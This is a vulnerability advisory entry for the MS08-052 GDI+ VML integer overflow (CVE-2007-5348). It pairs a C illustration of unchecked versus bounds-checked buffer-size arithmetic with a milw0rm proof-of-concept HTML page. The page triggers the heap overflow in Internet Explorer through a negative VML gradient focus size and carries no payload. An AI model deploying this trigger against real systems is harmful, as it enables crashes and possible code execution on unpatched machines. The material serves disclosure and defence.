Microsoft GDI+ VML Buffer Overflow Vulnerability

Vulnerability ID 1116266 Vulnerability type Numeric error (integer overflow)
Published 2008-09-28 Updated 2009-04-01
CVE ID CVE-2007-5348 CNNVD ID CNNVD-200809-176
Platform Windows CVSS score 9.3
|Vulnerability sources
https://www.exploit-db.com/exploits/6619
https://www.securityfocus.com/bid/31018
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-176
|Vulnerability details
Microsoft GDI+ exposes a range of graphics facilities through a class-based API. An integer overflow exists in the GDI+ component shipped with many Microsoft products (Internet Explorer 6 SP1; Windows XP SP2 and SP3; Server 2003 SP1 and SP2; Vista Gold and SP1; Server 2008; Office XP SP3; Office 2003 SP2 and SP3; 2007 Microsoft Office System Gold and SP1; Visio 2002 SP2; PowerPoint Viewer 2003; Works 8; Digital Image Suite 2006; SQL Server 2000 Reporting Services SP2; SQL Server 2005 SP2; Report Viewer 2005 SP1 and 2008; and Forefront Client Security 1.0). A remote attacker can supply an image file whose gradient fill carries crafted gradient sizes: the size arithmetic wraps, the buffer allocated for the gradient is too small, and the fill then overruns it (a heap-based buffer overflow), which can be leveraged to execute arbitrary code. The flaw is related to GdiPlus.dll and VGX.dll and is also known as the "GDI+ VML Buffer Overrun Vulnerability" (MS08-052). Because VML is rendered through GDI+, a web page viewed in Internet Explorer is one delivery vector, as the PoC below shows.
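The integer-overflow pattern described above, as an added illustration that is not GDI+ code and not the advisory's own: a simplified gradient-buffer size computation in C, with the unchecked arithmetic beside an overflow-checked version, and a helper showing what a negative focus size such as the PoC's "-5, -4" becomes once read as an unsigned dimension. The function names, the 4-byte-per-pixel constant and the sample dimensions are assumptions made for this example; the real GdiPlus.dll arithmetic is not reproduced here.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical constant for the example: bytes per gradient pixel. */
#define BYTES_PER_PIXEL 4u

/* Vulnerable pattern (hypothetical, modelled on the advisory's description):
 * the buffer size is computed in 32-bit unsigned arithmetic with no range
 * check, so crafted dimensions wrap modulo 2^32 and yield a tiny size. */
uint32_t gradient_buf_size_unchecked(uint32_t width, uint32_t height)
{
    return width * height * BYTES_PER_PIXEL;   /* silently wraps */
}

/* Hardened version: compute in 64 bits and reject anything that would not
 * fit in 32 bits, plus degenerate zero sizes. Returns false on rejection. */
bool gradient_buf_size_checked(uint32_t width, uint32_t height, uint32_t *out)
{
    if (width == 0 || height == 0)
        return false;
    uint64_t pixels = (uint64_t)width * (uint64_t)height;
    if (pixels > (uint64_t)UINT32_MAX / BYTES_PER_PIXEL)
        return false;
    *out = (uint32_t)(pixels * BYTES_PER_PIXEL);
    return true;
}

/* Convenience wrapper: checked size, or 0 when the dimensions are rejected. */
uint32_t checked_size_or_zero(uint32_t width, uint32_t height)
{
    uint32_t sz = 0;
    return gradient_buf_size_checked(width, height, &sz) ? sz : 0;
}

/* Would a fill loop that writes width*height pixels overrun a buffer sized
 * with the unchecked arithmetic? Compares the true byte count (64-bit) with
 * the wrapped allocation size; true means heap overflow. */
bool fill_would_overrun(uint32_t width, uint32_t height)
{
    uint64_t needed = (uint64_t)width * (uint64_t)height * BYTES_PER_PIXEL;
    return needed > gradient_buf_size_unchecked(width, height);
}

/* The PoC passes negative focus sizes ("-5, -4"). Reinterpreting a negative
 * signed dimension as unsigned turns it into a value near 2^32, which is the
 * other classic way such a size computation goes wrong. */
uint32_t as_unsigned_dimension(int32_t v)
{
    return (uint32_t)v;
}

int main(void)
{
    /* Constructed sample: 65536 x 65536 pixels = 2^32 pixels, wraps to 0. */
    uint32_t w = 65536u, h = 65536u;
    printf("unchecked size: %u bytes (wrapped)\n", gradient_buf_size_unchecked(w, h));
    printf("would overrun: %s\n", fill_would_overrun(w, h) ? "yes" : "no");
    printf("checked size: %u (0 = rejected)\n", checked_size_or_zero(w, h));
    printf("benign 100x100 checked size: %u\n", checked_size_or_zero(100u, 100u));
    printf("-5 as unsigned: %u\n", as_unsigned_dimension(-5));
    return 0;
}
```

The check divides UINT32_MAX by the per-pixel multiplier before comparing, which avoids overflowing the 64-bit intermediate for any 32-bit inputs; the same shape (widen, bound, then narrow) is the usual fix for size arithmetic on attacker-controlled image dimensions.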
|Exploit (PoC)
<html>
<head>
<STYLE>
/* Bind the "ef" prefix to IE's built-in VML behavior, so <ef:*> elements are rendered by VGX.dll */
ef\:* { behavior: url(#default#VML); } 
</STYLE>
</head>

<body>

<pre>
================================================
MS08-052: GDI+ Vulnerability
------------------------------------------------
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180

Credit:
John Smith,
Evil Fingers

Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
================================================
</pre>

<XML:NAMESPACE  ns="urn:schemas-microsoft-com:vml" prefix="ef">

<!-- VML shape with a centred gradient fill; the gradient parameters are set from script below -->
<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'>
<ef:fill type="gradientCenter"></ef:fill>
</ef:oval>
		
<script>
// Negative focus size for the gradient. The size computation in GDI+ does not
// validate it, the derived buffer size wraps, and the gradient fill overruns the
// heap buffer. This PoC only triggers the overflow; it carries no payload.
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');

ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>

# milw0rm.com [2008-09-28]
|Affected products
Symantec Backup Exec for Windows Servers 12.0; Symantec Backup Exec for Windows Servers 11d; RIM BlackBerry Unite! 1.0.1 bundle 36; RIM BlackBerry Unite! 1.0.1; RIM BlackBerry Unite! 1.0